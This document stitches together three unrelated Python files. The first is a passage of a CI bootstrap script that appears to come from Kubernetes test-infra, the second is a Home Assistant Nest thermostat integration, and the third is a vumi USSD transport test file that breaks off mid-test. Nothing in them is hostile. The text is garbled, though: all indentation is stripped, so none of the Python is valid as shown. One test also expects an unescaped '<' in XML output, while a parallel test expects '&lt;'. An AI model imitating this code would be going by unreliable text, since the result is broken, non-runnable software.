except subprocess.CalledProcessError:
logging.warning('Failed to append to %s#%s', path, gen)
errors += 1
def metadata(repos, artifacts, call):
"""Return metadata associated for the build, including inside artifacts."""
path = os.path.join(artifacts or '', 'metadata.json')
meta = None
if os.path.isfile(path):
try:
with open(path) as fp:
meta = json.loads(fp.read())
except (IOError, ValueError):
pass
if not meta or not isinstance(meta, dict):
meta = {}
if repos:
meta['repo'] = repos.main
meta['repos'] = repos_dict(repos)
try:
commit = call(['git', 'rev-parse', 'HEAD'], output=True)
if commit:
meta['repo-commit'] = commit.strip()
except subprocess.CalledProcessError:
pass
return meta
def finish(gsutil, paths, success, artifacts, build, version, repos, call):
"""
Args:
paths: a Paths instance.
success: the build passed if true.
artifacts: a dir containing artifacts to upload.
build: identifier of this build.
version: identifies what version of the code the build tested.
repo: the target repo
"""
if os.path.isdir(artifacts) and any(f for _, _, f in os.walk(artifacts)):
try:
gsutil.upload_artifacts(paths.artifacts, artifacts)
except subprocess.CalledProcessError:
logging.warning('Failed to upload artifacts')
meta = metadata(repos, artifacts, call)
if not version:
version = meta.get('job-version')
if not version: # TODO(fejta): retire
version = meta.get('version')
# github.com/kubernetes/release/find_green_build depends on append_result()
# TODO(fejta): reconsider whether this is how we want to solve this problem.
append_result(gsutil, paths.result_cache, build, version, success)
if paths.pr_result_cache:
append_result(gsutil, paths.pr_result_cache, build, version, success)
data = {
# TODO(fejta): update utils.go in contrib to accept a float
'timestamp': int(time.time()),
'result': 'SUCCESS' if success else 'FAILURE',
'passed': bool(success),
'metadata': meta,
}
if version:
data['job-version'] = version
data['version'] = version # TODO(fejta): retire
gsutil.upload_json(paths.finished, data)
# Upload the latest build for the job.
# Do this last, since other tools expect the rest of the data to be
# published when this file is created.
for path in {paths.latest, paths.pr_latest}:
if path:
try:
gsutil.upload_text(path, str(build), cached=False)
except subprocess.CalledProcessError:
logging.warning('Failed to update %s', path)
def test_infra(*paths):
"""Return path relative to root of test-infra repo."""
return os.path.join(ORIG_CWD, os.path.dirname(__file__), '..', *paths)
def node():
"""Return the name of the node running the build."""
# TODO(fejta): jenkins sets the node name and our infra expect this value.
# TODO(fejta): Consider doing something different here.
if NODE_ENV not in os.environ:
os.environ[NODE_ENV] = ''.join(socket.gethostname().split('.')[:1])
return os.environ[NODE_ENV]
def find_version(call):
"""Determine and return the version of the build."""
# TODO(fejta): once job-version is functional switch this to
# git rev-parse [--short=N] HEAD^{commit}
version_file = 'version'
if os.path.isfile(version_file):
# e2e tests which download kubernetes use this path:
with open(version_file) as fp:
return fp.read().strip()
version_script = 'hack/lib/version.sh'
if os.path.isfile(version_script):
cmd = [
'bash', '-c', (
"""
set -o errexit
set -o nounset
export KUBE_ROOT=.
source %s
kube::version::get_version_vars
echo $KUBE_GIT_VERSION
""" % version_script)
]
return call(cmd, output=True).strip()
return 'unknown'
class Paths(object): # pylint: disable=too-many-instance-attributes,too-few-public-methods
"""Links to remote gcs-paths for uploading results."""
def __init__( # pylint: disable=too-many-arguments
self,
artifacts, # artifacts folder (in build)
build_log, # build-log.txt (in build)
pr_path, # path to build
finished, # finished.json (metadata from end of build)
latest, # latest-build.txt (in job)
        pr_build_link, # file containing pr_path (in job directory)
pr_latest, # latest-build.txt (in pr job)
pr_result_cache, # jobResultsCache.json (in pr job)
result_cache, # jobResultsCache.json (cache of latest results in job)
started, # started.json (metadata from start of build)
):
self.artifacts = artifacts
self.build_log = build_log
self.pr_path = pr_path
self.finished = finished
self.latest = latest
self.pr_build_link = pr_build_link
self.pr_latest = pr_latest
self.pr_result_cache = pr_result_cache
self.result_cache = result_cache
self.started = started
def ci_paths(base, job, build):
"""Return a Paths() instance for a continuous build."""
latest = os.path.join(base, job, 'latest-build.txt')
return Paths(
artifacts=os.path.join(base, job, build, 'artifacts'),
build_log=os.path.join(base, job, build, 'build-log.txt'),
pr_path=None,
finished=os.path.join(base, job, build, 'finished.json'),
latest=latest,
pr_build_link=None,
pr_latest=None,
pr_result_cache=None,
result_cache=os.path.join(base, job, 'jobResultsCache.json'),
started=os.path.join(base, job, build, 'started.json'),
)
def pr_paths(base, repos, job, build):
"""Return a Paths() instance for a PR."""
if not repos:
raise ValueError('repos is empty')
repo = repos.main
pull = str(repos[repo][1])
if repo in ['k8s.io/kubernetes', 'kubernetes/kubernetes']:
prefix = ''
elif repo.startswith('k8s.io/'):
prefix = repo[len('k8s.io/'):]
elif repo.startswith('kubernetes/'):
prefix = repo[len('kubernetes/'):]
elif repo.startswith('github.com/'):
prefix = repo[len('github.com/'):].replace('/', '_')
else:
prefix = repo.replace('/', '_')
# Batch merges are those with more than one PR specified.
pr_nums = pull_numbers(pull)
if len(pr_nums) > 1:
pull = os.path.join(prefix, 'batch')
else:
pull = os.path.join(prefix, pr_nums[0])
pr_path = os.path.join(base, 'pull', pull, job, build)
result_cache = os.path.join(
base, 'directory', job, 'jobResultsCache.json')
pr_result_cache = os.path.join(
base, 'pull', pull, job, 'jobResultsCache.json')
return Paths(
artifacts=os.path.join(pr_path, 'artifacts'),
build_log=os.path.join(pr_path, 'build-log.txt'),
pr_path=pr_path,
finished=os.path.join(pr_path, 'finished.json'),
latest=os.path.join(base, 'directory', job, 'latest-build.txt'),
pr_build_link=os.path.join(base, 'directory', job, '%s.txt' % build),
pr_latest=os.path.join(base, 'pull', pull, job, 'latest-build.txt'),
pr_result_cache=pr_result_cache,
result_cache=result_cache,
started=os.path.join(pr_path, 'started.json'),
)
BUILD_ENV = 'BUILD_NUMBER'
BOOTSTRAP_ENV = 'BOOTSTRAP_MIGRATION'
CLOUDSDK_ENV = 'CLOUDSDK_CONFIG'
GCE_KEY_ENV = 'JENKINS_GCE_SSH_PRIVATE_KEY_FILE'
GUBERNATOR = 'https://k8s-gubernator.appspot.com/build'
HOME_ENV = 'HOME'
JOB_ENV = 'JOB_NAME'
NODE_ENV = 'NODE_NAME'
SERVICE_ACCOUNT_ENV = 'GOOGLE_APPLICATION_CREDENTIALS'
WORKSPACE_ENV = 'WORKSPACE'
def build_name(started):
"""Return the unique(ish) string representing this build."""
# TODO(fejta): right now jenkins sets the BUILD_NUMBER and does this
# in an environment variable. Consider migrating this to a
# bootstrap.py flag
if BUILD_ENV not in os.environ:
# Automatically generate a build number if none is set
uniq = '%x-%d' % (hash(node()), os.getpid())
autogen = time.strftime('%Y%m%d-%H%M%S-' + uniq, time.gmtime(started))
os.environ[BUILD_ENV] = autogen
return os.environ[BUILD_ENV]
def setup_credentials(call, robot, upload):
"""Activate the service account unless robot is none."""
# TODO(fejta): stop activating inside the image
# TODO(fejta): allow use of existing gcloud auth
if robot:
os.environ[SERVICE_ACCOUNT_ENV] = robot
if not os.getenv(SERVICE_ACCOUNT_ENV) and upload:
logging.warning('Cannot --upload=%s, no active gcloud account.', upload)
raise ValueError('--upload requires --service-account')
if not os.getenv(SERVICE_ACCOUNT_ENV) and not upload:
logging.info('Will not upload results.')
return
if not os.path.isfile(os.environ[SERVICE_ACCOUNT_ENV]):
raise IOError(
'Cannot find service account credentials',
os.environ[SERVICE_ACCOUNT_ENV],
'Create service account and then create key at '
'https://console.developers.google.com/iam-admin/serviceaccounts/project', # pylint: disable=line-too-long
)
call([
'gcloud',
'auth',
'activate-service-account',
'--key-file=%s' % os.environ[SERVICE_ACCOUNT_ENV],
])
try: # Old versions of gcloud may not support this value
account = call(
['gcloud', 'config', 'get-value', 'account'], output=True).strip()
except subprocess.CalledProcessError:
account = 'unknown'
logging.info('Will upload results to %s using %s', upload, account)
def setup_logging(path):
"""Initialize logging to screen and path."""
# See https://docs.python.org/2/library/logging.html#logrecord-attributes
# [IWEF]mmdd HH:MM:SS.mmm] msg
fmt = '%(levelname).1s%(asctime)s.%(msecs)03d] %(message)s' # pylint: disable=line-too-long
datefmt = '%m%d %H:%M:%S'
logging.basicConfig(
level=logging.INFO,
format=fmt,
datefmt=datefmt,
)
build_log = logging.FileHandler(filename=path, mode='w')
build_log.setLevel(logging.INFO)
formatter = logging.Formatter(fmt, datefmt=datefmt)
build_log.setFormatter(formatter)
logging.getLogger('').addHandler(build_log)
return build_log
def setup_magic_environment(job):
"""Set magic environment variables scripts currently expect."""
home = os.environ[HOME_ENV]
# TODO(fejta): jenkins sets these values. Consider migrating to using
# a secret volume instead and passing the path to this volume
# into bootstrap.py as a flag.
os.environ.setdefault(
GCE_KEY_ENV,
os.path.join(home, '.ssh/google_compute_engine'),
)
os.environ.setdefault(
'JENKINS_GCE_SSH_PUBLIC_KEY_FILE',
os.path.join(home, '.ssh/google_compute_engine.pub'),
)
os.environ.setdefault(
'JENKINS_AWS_SSH_PRIVATE_KEY_FILE',
os.path.join(home, '.ssh/kube_aws_rsa'),
)
os.environ.setdefault(
'JENKINS_AWS_SSH_PUBLIC_KEY_FILE',
os.path.join(home, '.ssh/kube_aws_rsa.pub'),
)
cwd = os.getcwd()
# TODO(fejta): jenkins sets WORKSPACE and pieces of our infra expect this
# value. Consider doing something else in the future.
os.environ[WORKSPACE_ENV] = cwd
# TODO(fejta): jenkins/dockerized-e2e-runner.sh also sets HOME to WORKSPACE,
# probably to minimize leakage between jobs.
# Consider accomplishing this another way.
os.environ[HOME_ENV] = cwd
# TODO(fejta): jenkins sets JOB_ENV and pieces of our infra expect this
# value. Consider making everything below here agnostic to the
# job name.
if JOB_ENV not in os.environ:
os.environ[JOB_ENV] = job
elif os.environ[JOB_ENV] != job:
logging.warning('%s=%s (overrides %s)', JOB_ENV, job, os.environ[JOB_ENV])
os.environ[JOB_ENV] = job
    # TODO(fejta): Magic value to tell our test code not to upload started.json
# TODO(fejta): delete upload-to-gcs.sh and then this value.
os.environ[BOOTSTRAP_ENV] = 'yes'
# This helps prevent reuse of cloudsdk configuration. It also reduces the
# risk that running a job on a workstation corrupts the user's config.
os.environ[CLOUDSDK_ENV] = '%s/.config/gcloud' % cwd
def job_args(args):
"""Converts 'a ${FOO} $bar' into 'a wildly different string'."""
return [os.path.expandvars(a) for a in args]
def job_script(job, use_json):
"""Return path to script for job."""
if not use_json:
return [test_infra('jobs/%s.sh' % job)]
with open(test_infra('jobs/config.json')) as fp:
config = json.loads(fp.read())
job_config = config[job]
cmd = test_infra('scenarios/%s.py' % job_config['scenario'])
return [cmd] + job_args(job_config.get('args', []))
def gubernator_uri(paths):
"""Return a gubernator link for this build."""
job = os.path.dirname(paths.build_log)
if job.startswith('gs:/'):
return job.replace('gs:/', GUBERNATOR, 1)
return job
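# For example, if paths.build_log is 'gs://bucket/logs/my-job/42/build-log.txt',
# this returns 'https://k8s-gubernator.appspot.com/build/bucket/logs/my-job/42'.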
@contextlib.contextmanager
def choose_ssh_key(ssh):
"""Creates a script for GIT_SSH that uses -i ssh if set."""
if not ssh: # Nothing to do
yield
return
# Create a script for use with GIT_SSH, which defines the program git uses
# during git fetch. In the future change this to GIT_SSH_COMMAND
# https://superuser.com/questions/232373/how-to-tell-git-which-private-key-to-use
with tempfile.NamedTemporaryFile(prefix='ssh', delete=False) as fp:
fp.write('#!/bin/sh\nssh -o StrictHostKeyChecking=no -i \'%s\' -F /dev/null "${@}"\n' % ssh)
try:
os.chmod(fp.name, 0500)
had = 'GIT_SSH' in os.environ
old = os.getenv('GIT_SSH')
os.environ['GIT_SSH'] = fp.name
yield
del os.environ['GIT_SSH']
if had:
os.environ['GIT_SSH'] = old
finally:
os.unlink(fp.name)
def setup_root(call, root, repos, ssh, git_cache, clean):
"""Create root dir, checkout repo and cd into resulting dir."""
if not os.path.exists(root):
os.makedirs(root)
root_dir = os.path.realpath(root)
logging.info('Root: %s', root_dir)
with choose_ssh_key(ssh):
for repo, (branch, pull) in repos.items():
os.chdir(root_dir)
logging.info(
'Checkout: %s %s',
os.path.join(root_dir, repo),
pull and pull or branch)
checkout(call, repo, branch, pull, ssh, git_cache, clean)
if len(repos) > 1: # cd back into the primary repo
os.chdir(root_dir)
os.chdir(repos.main)
class Repos(dict):
"""{"repo": (branch, pull)} dict with a .main attribute."""
main = ''
def __setitem__(self, k, v):
if not self:
self.main = k
return super(Repos, self).__setitem__(k, v)
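# Example (illustrative): the first repository inserted becomes the primary one.
#     repos = Repos()
#     repos['k8s.io/kubernetes'] = ('master', '')
#     repos['k8s.io/test-infra'] = ('', '123:abcd')
#     repos.main == 'k8s.io/kubernetes'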
def parse_repos(args):
"""Convert --repo=foo=this,123:abc,555:ddd into a Repos()."""
repos = args.repo or {}
if not repos and not args.bare:
raise ValueError('--bare or --repo required')
ret = Repos()
if len(repos) != 1:
if args.pull:
raise ValueError('Multi --repo does not support --pull, use --repo=R=branch,p1,p2')
if args.branch:
raise ValueError('Multi --repo does not support --branch, use --repo=R=branch')
elif len(repos) == 1 and (args.branch or args.pull):
repo = repos[0]
if '=' in repo or ':' in repo:
raise ValueError('--repo cannot contain = or : with --branch or --pull')
ret[repo] = (args.branch, args.pull)
return ret
for repo in repos:
mat = re.match(r'([^=]+)(=([^:,~^\s]+(:[0-9a-fA-F]+)?(,|$))+)?$', repo)
if not mat:
raise ValueError('bad repo', repo, repos)
this_repo = mat.group(1)
if not mat.group(2):
ret[this_repo] = ('master', '')
continue
commits = mat.group(2)[1:].split(',')
if len(commits) == 1:
# Checking out a branch, possibly at a specific commit
ret[this_repo] = (commits[0], '')
continue
# Checking out one or more PRs
ret[this_repo] = ('', ','.join(commits))
return ret
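# Illustrative mappings (assuming --branch, --pull and --bare are unset):
#     --repo=k8s.io/kubernetes                      -> {'k8s.io/kubernetes': ('master', '')}
#     --repo=k8s.io/kubernetes=release-1.5          -> {'k8s.io/kubernetes': ('release-1.5', '')}
#     --repo=k8s.io/kubernetes=master:abcd,123:ef12 -> {'k8s.io/kubernetes': ('', 'master:abcd,123:ef12')}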
def bootstrap(args):
"""Clone repo at pull/branch into root and run job script."""
# pylint: disable=too-many-locals,too-many-branches,too-many-statements
job = args.job
repos = parse_repos(args)
upload = args.upload
use_json = args.json
build_log_path = os.path.abspath('build-log.txt')
build_log = setup_logging(build_log_path)
started = time.time()
if args.timeout:
end = started + args.timeout * 60
else:
end = 0
call = lambda *a, **kw: _call(end, *a, **kw)
gsutil = GSUtil(call)
logging.info('Bootstrap %s...', job)
build = build_name(started)
if upload:
if repos and repos[repos.main][1]: # merging commits, a pr
paths = pr_paths(upload, repos, job, build)
else:
paths = ci_paths(upload, job, build)
logging.info('Gubernator results at %s', gubernator_uri(paths))
version = 'unknown'
exc_type = None
setup_creds = False
try:
setup_root(call, args.root, repos, args.ssh, args.git_cache, args.clean)
logging.info('Configure environment...')
if repos:
version = find_version(call)
else:
version = ''
setup_magic_environment(job)
setup_credentials(call, args.service_account, upload)
setup_creds = True
logging.info('Start %s at %s...', build, version)
if upload:
start(gsutil, paths, started, node(), version, repos)
success = False
try:
call(job_script(job, use_json))
logging.info('PASS: %s', job)
success = True
except subprocess.CalledProcessError:
logging.error('FAIL: %s', job)
except Exception: # pylint: disable=broad-except
exc_type, exc_value, exc_traceback = sys.exc_info()
logging.exception('unexpected error')
success = False
if not setup_creds:
setup_credentials(call, args.service_account, upload)
if upload:
logging.info('Upload result and artifacts...')
logging.info('Gubernator results at %s', gubernator_uri(paths))
try:
finish(gsutil, paths, success, '_artifacts', build, version, repos, call)
except subprocess.CalledProcessError: # Still try to upload build log
success = False
logging.getLogger('').removeHandler(build_log)
build_log.close()
if upload:
gsutil.copy_file(paths.build_log, build_log_path)
if exc_type:
raise exc_type, exc_value, exc_traceback # pylint: disable=raising-bad-type
if not success:
# TODO(fejta/spxtr): we should distinguish infra and non-infra problems
# by exit code and automatically retrigger after an infra-problem.
sys.exit(1)
def parse_args(arguments=None):
"""Parse arguments or sys.argv[1:]."""
parser = argparse.ArgumentParser()
parser.add_argument(
'--json',
nargs='?', const=1, default=0,
type=int, help='--job is a json key, not a .sh')
parser.add_argument('--root', default='.', help='Root dir to work with')
parser.add_argument(
'--timeout', type=float, default=0, help='Timeout in minutes if set')
parser.add_argument(
'--pull',
help='Deprecated, use --repo=k8s.io/foo=master:abcd,12:ef12,45:ff65')
parser.add_argument(
'--branch',
help='Deprecated, use --repo=k8s.io/foo=master')
parser.add_argument(
'--repo',
action='append',
help='Fetch the specified repositories, with the first one considered primary')
parser.add_argument(
'--bare',
action='store_true',
help='Do not check out a repository')
parser.add_argument('--job', required=True, help='Name of the job to run')
parser.add_argument(
'--upload',
help='Upload results here if set, requires --service-account')
parser.add_argument(
'--service-account',
help='Activate and use path/to/service-account.json if set.')
parser.add_argument(
'--ssh',
help='Use the ssh key to fetch the repository instead of https if set.')
parser.add_argument(
'--git-cache',
help='Location of the git cache.')
parser.add_argument(
'--clean',
action='store_true',
help='Clean the git repo before running tests.')
args = parser.parse_args(arguments)
if bool(args.repo) == bool(args.bare):
raise argparse.ArgumentTypeError(
'Expected --repo xor --bare:', args.repo, args.bare)
return args
if __name__ == '__main__':
ARGS = parse_args()
bootstrap(ARGS)
|
|
"""
Support for Nest thermostats.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/climate.nest/
"""
import logging
import voluptuous as vol
from homeassistant.components.nest import (
DATA_NEST, SIGNAL_NEST_UPDATE, DOMAIN as NEST_DOMAIN)
from homeassistant.components.climate import (
STATE_AUTO, STATE_COOL, STATE_HEAT, STATE_ECO, ClimateDevice,
PLATFORM_SCHEMA, ATTR_TARGET_TEMP_HIGH, ATTR_TARGET_TEMP_LOW,
ATTR_TEMPERATURE, SUPPORT_TARGET_TEMPERATURE,
SUPPORT_TARGET_TEMPERATURE_HIGH, SUPPORT_TARGET_TEMPERATURE_LOW,
SUPPORT_OPERATION_MODE, SUPPORT_AWAY_MODE, SUPPORT_FAN_MODE)
from homeassistant.const import (
TEMP_CELSIUS, TEMP_FAHRENHEIT,
CONF_SCAN_INTERVAL, STATE_ON, STATE_OFF)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
DEPENDENCIES = ['nest']
_LOGGER = logging.getLogger(__name__)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_SCAN_INTERVAL):
vol.All(vol.Coerce(int), vol.Range(min=1)),
})
NEST_MODE_HEAT_COOL = 'heat-cool'
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Nest thermostat.
No longer in use.
"""
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up the Nest climate device based on a config entry."""
temp_unit = hass.config.units.temperature_unit
thermostats = await hass.async_add_job(hass.data[DATA_NEST].thermostats)
all_devices = [NestThermostat(structure, device, temp_unit)
for structure, device in thermostats]
async_add_entities(all_devices, True)
class NestThermostat(ClimateDevice):
"""Representation of a Nest thermostat."""
def __init__(self, structure, device, temp_unit):
"""Initialize the thermostat."""
self._unit = temp_unit
self.structure = structure
self.device = device
self._fan_list = [STATE_ON, STATE_AUTO]
# Set the default supported features
self._support_flags = (SUPPORT_TARGET_TEMPERATURE |
SUPPORT_OPERATION_MODE | SUPPORT_AWAY_MODE)
        # Not all Nest devices support both cooling and heating; remove unused modes
self._operation_list = [STATE_OFF]
# Add supported nest thermostat features
if self.device.can_heat:
self._operation_list.append(STATE_HEAT)
if self.device.can_cool:
self._operation_list.append(STATE_COOL)
if self.device.can_heat and self.device.can_cool:
self._operation_list.append(STATE_AUTO)
self._support_flags = (self._support_flags |
SUPPORT_TARGET_TEMPERATURE_HIGH |
SUPPORT_TARGET_TEMPERATURE_LOW)
self._operation_list.append(STATE_ECO)
# feature of device
self._has_fan = self.device.has_fan
if self._has_fan:
self._support_flags = (self._support_flags | SUPPORT_FAN_MODE)
# data attributes
self._away = None
self._location = None
self._name = None
self._humidity = None
self._target_temperature = None
self._temperature = None
self._temperature_scale = None
self._mode = None
self._fan = None
self._eco_temperature = None
self._is_locked = None
self._locked_temperature = None
self._min_temperature = None
self._max_temperature = None
@property
def should_poll(self):
"""Do not need poll thanks using Nest streaming API."""
return False
async def async_added_to_hass(self):
"""Register update signal handler."""
async def async_update_state():
"""Update device state."""
await self.async_update_ha_state(True)
async_dispatcher_connect(self.hass, SIGNAL_NEST_UPDATE,
async_update_state)
@property
def supported_features(self):
"""Return the list of supported features."""
return self._support_flags
@property
def unique_id(self):
"""Return unique ID for this device."""
return self.device.serial
@property
def device_info(self):
"""Return information about the device."""
return {
'identifiers': {
(NEST_DOMAIN, self.device.device_id),
},
'name': self.device.name_long,
'manufacturer': 'Nest Labs',
'model': "Thermostat",
'sw_version': self.device.software_version,
}
@property
def name(self):
"""Return the name of the nest, if any."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return self._temperature_scale
@property
def current_temperature(self):
"""Return the current temperature."""
return self._temperature
@property
def current_operation(self):
"""Return current operation ie. heat, cool, idle."""
if self._mode in [STATE_HEAT, STATE_COOL, STATE_OFF, STATE_ECO]:
return self._mode
if self._mode == NEST_MODE_HEAT_COOL:
return STATE_AUTO
return None
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self._mode not in (NEST_MODE_HEAT_COOL, STATE_ECO):
return self._target_temperature
return None
@property
def target_temperature_low(self):
"""Return the lower bound temperature we try to reach."""
if self._mode == STATE_ECO:
return self._eco_temperature[0]
if self._mode == NEST_MODE_HEAT_COOL:
return self._target_temperature[0]
return None
@property
def target_temperature_high(self):
"""Return the upper bound temperature we try to reach."""
if self._mode == STATE_ECO:
return self._eco_temperature[1]
if self._mode == NEST_MODE_HEAT_COOL:
return self._target_temperature[1]
return None
@property
def is_away_mode_on(self):
"""Return if away mode is on."""
return self._away
def set_temperature(self, **kwargs):
"""Set new target temperature."""
import nest
temp = None
target_temp_low = kwargs.get(ATTR_TARGET_TEMP_LOW)
target_temp_high = kwargs.get(ATTR_TARGET_TEMP_HIGH)
if self._mode == NEST_MODE_HEAT_COOL:
if target_temp_low is not None and target_temp_high is not None:
temp = (target_temp_low, target_temp_high)
_LOGGER.debug("Nest set_temperature-output-value=%s", temp)
else:
temp = kwargs.get(ATTR_TEMPERATURE)
_LOGGER.debug("Nest set_temperature-output-value=%s", temp)
try:
if temp is not None:
self.device.target = temp
except nest.nest.APIError as api_error:
_LOGGER.error("An error occurred while setting temperature: %s",
api_error)
# restore target temperature
self.schedule_update_ha_state(True)
def set_operation_mode(self, operation_mode):
"""Set operation mode."""
if operation_mode in [STATE_HEAT, STATE_COOL, STATE_OFF, STATE_ECO]:
device_mode = operation_mode
elif operation_mode == STATE_AUTO:
device_mode = NEST_MODE_HEAT_COOL
else:
device_mode = STATE_OFF
_LOGGER.error(
"An error occurred while setting device mode. "
"Invalid operation mode: %s", operation_mode)
self.device.mode = device_mode
@property
def operation_list(self):
"""List of available operation modes."""
return self._operation_list
def turn_away_mode_on(self):
"""Turn away on."""
self.structure.away = True
def turn_away_mode_off(self):
"""Turn away off."""
self.structure.away = False
@property
def current_fan_mode(self):
"""Return whether the fan is on."""
if self._has_fan:
# Return whether the fan is on
return STATE_ON if self._fan else STATE_AUTO
# No Fan available so disable slider
return None
@property
def fan_list(self):
"""List of available fan modes."""
if self._has_fan:
return self._fan_list
return None
def set_fan_mode(self, fan_mode):
"""Turn fan on/off."""
if self._has_fan:
self.device.fan = fan_mode.lower()
@property
def min_temp(self):
"""Identify min_temp in Nest API or defaults if not available."""
return self._min_temperature
@property
def max_temp(self):
"""Identify max_temp in Nest API or defaults if not available."""
return self._max_temperature
def update(self):
"""Cache value from Python-nest."""
self._location = self.device.where
self._name = self.device.name
self._humidity = self.device.humidity
self._temperature = self.device.temperature
self._mode = self.device.mode
self._target_temperature = self.device.target
self._fan = self.device.fan
self._away = self.structure.away == 'away'
self._eco_temperature = self.device.eco_temperature
self._locked_temperature = self.device.locked_temperature
self._min_temperature = self.device.min_temperature
self._max_temperature = self.device.max_temperature
self._is_locked = self.device.is_locked
if self.device.temperature_scale == 'C':
self._temperature_scale = TEMP_CELSIUS
else:
self._temperature_scale = TEMP_FAHRENHEIT
|
|
from twisted.internet.defer import inlineCallbacks, returnValue
from vumi.utils import http_request_full
from vumi.message import TransportUserMessage
from vumi.transports.mtech_ussd import MtechUssdTransport
from vumi.transports.mtech_ussd.mtech_ussd import MtechUssdResponse
from vumi.transports.tests.helpers import TransportHelper
from vumi.tests.helpers import VumiTestCase
class TestMtechUssdTransport(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.config = {
'transport_type': 'ussd',
'ussd_string_prefix': '*120*666#',
'web_path': "/foo",
'web_host': "127.0.0.1",
'web_port': 0,
'username': 'testuser',
'password': 'testpass',
}
self.tx_helper = self.add_helper(TransportHelper(MtechUssdTransport))
self.transport = yield self.tx_helper.get_transport(self.config)
self.transport_url = self.transport.get_transport_url().rstrip('/')
self.url = "%s%s" % (self.transport_url, self.config['web_path'])
yield self.transport.session_manager.redis._purge_all() # just in case
def make_ussd_request_full(self, session_id, **kwargs):
lines = [
'<?xml version="1.0" encoding="UTF-8"?>',
'<page version="2.0">',
' <session_id>%s</session_id>' % (session_id,),
]
for k, v in kwargs.items():
lines.append(' <%s>%s</%s>' % (k, v, k))
lines.append('</page>')
data = '\n'.join(lines)
return http_request_full(self.url, data, method='POST')
def make_ussd_request(self, session_id, **kwargs):
return self.make_ussd_request_full(session_id, **kwargs).addCallback(
lambda r: r.delivered_body)
@inlineCallbacks
def reply_to_message(self, content, **kw):
[msg] = yield self.tx_helper.wait_for_dispatched_inbound(1)
yield self.tx_helper.make_dispatch_reply(msg, content, **kw)
returnValue(msg)
@inlineCallbacks
def test_empty_request(self):
response = yield http_request_full(self.url, "", method='POST')
self.assertEqual(response.code, 400)
@inlineCallbacks
def test_bad_request(self):
response = yield http_request_full(self.url, "blah", method='POST')
self.assertEqual(response.code, 400)
@inlineCallbacks
def test_inbound_new_continue(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
response_d = self.make_ussd_request(
sid, mobile_number='2348085832481', page_id='0',
data='testmenu', gate='gateid')
msg = yield self.reply_to_message("OK\n1 < 2")
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['transport_type'], "ussd")
self.assertEqual(msg['transport_metadata'], {"session_id": sid})
self.assertEqual(msg['session_event'],
TransportUserMessage.SESSION_NEW)
self.assertEqual(msg['from_addr'], '2348085832481')
# self.assertEqual(msg['to_addr'], '*120*666#')
self.assertEqual(msg['content'], 'testmenu')
response = yield response_d
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
'<div>OK<br />1 < 2</div>',
'<navigation>',
'<link accesskey="*" pageId="indexX" />',
'</navigation>',
'</page>',
])
self.assertEqual(response, correct_response)
@inlineCallbacks
def test_inbound_resume_continue(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
yield self.transport.save_session(sid, '2348085832481', '*120*666#')
response_d = self.make_ussd_request(sid, page_id="indexX", data="foo")
msg = yield self.reply_to_message("OK")
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['transport_type'], "ussd")
self.assertEqual(msg['transport_metadata'], {"session_id": sid})
self.assertEqual(msg['session_event'],
TransportUserMessage.SESSION_RESUME)
self.assertEqual(msg['from_addr'], '2348085832481')
self.assertEqual(msg['to_addr'], '*120*666#')
self.assertEqual(msg['content'], 'foo')
response = yield response_d
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
'<div>OK</div>',
'<navigation>',
'<link accesskey="*" pageId="indexX" />',
'</navigation>',
'</page>',
])
self.assertEqual(response, correct_response)
@inlineCallbacks
def test_nack(self):
msg = yield self.tx_helper.make_dispatch_outbound("outbound")
[nack] = yield self.tx_helper.wait_for_dispatched_events(1)
self.assertEqual(nack['user_message_id'], msg['message_id'])
self.assertEqual(nack['sent_message_id'], msg['message_id'])
self.assertEqual(nack['nack_reason'],
'Missing in_reply_to, content or session_id')
@inlineCallbacks
def test_inbound_missing_session(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
response = yield self.make_ussd_request_full(
sid, page_id="indexX", data="foo")
self.assertEqual(400, response.code)
self.assertEqual('', response.delivered_body)
@inlineCallbacks
def test_inbound_new_and_resume(self):
sid = 'a41739890287485d968ea66e8b44bfd3'
response_d = self.make_ussd_request(
sid, mobile_number='2348085832481', page_id='0',
data='testmenu', gate='gateid')
msg = yield self.reply_to_message("OK\n1 < 2")
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['transport_type'], "ussd")
self.assertEqual(msg['transport_metadata'], {"session_id": sid})
self.assertEqual(msg['session_event'],
TransportUserMessage.SESSION_NEW)
self.assertEqual(msg['from_addr'], '2348085832481')
# self.assertEqual(msg['to_addr'], '*120*666#')
self.assertEqual(msg['content'], 'testmenu')
response = yield response_d
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
            '<div>OK<br />1 &lt; 2</div>',
'<navigation>',
'<link accesskey="*" pageId="indexX" />',
'</navigation>',
'</page>',
])
self.assertEqual(response, correct_response)
self.tx_helper.clear_all_dispatched()
response_d = self.make_ussd_request(sid, page_id="indexX", data="foo")
msg = yield self.reply_to_message("OK")
self.assertEqual(msg['transport_name'], self.tx_helper.transport_name)
self.assertEqual(msg['transport_type'], "ussd")
self.assertEqual(msg['transport_metadata'], {"session_id": sid})
self.assertEqual(msg['session_event'],
TransportUserMessage.SESSION_RESUME)
self.assertEqual(msg['from_addr'], '2348085832481')
self.assertEqual(msg['to_addr'], 'gateid')
self.assertEqual(msg['content'], 'foo')
response = yield response_d
correct_response = ''.join([
"<?xml version='1.0' encoding='UTF-8'?>",
'<page version="2.0">',
'<session_id>a41739890287485d968ea66e8b44bfd3</session_id>',
'<div>OK</div>',
'<navigation>',
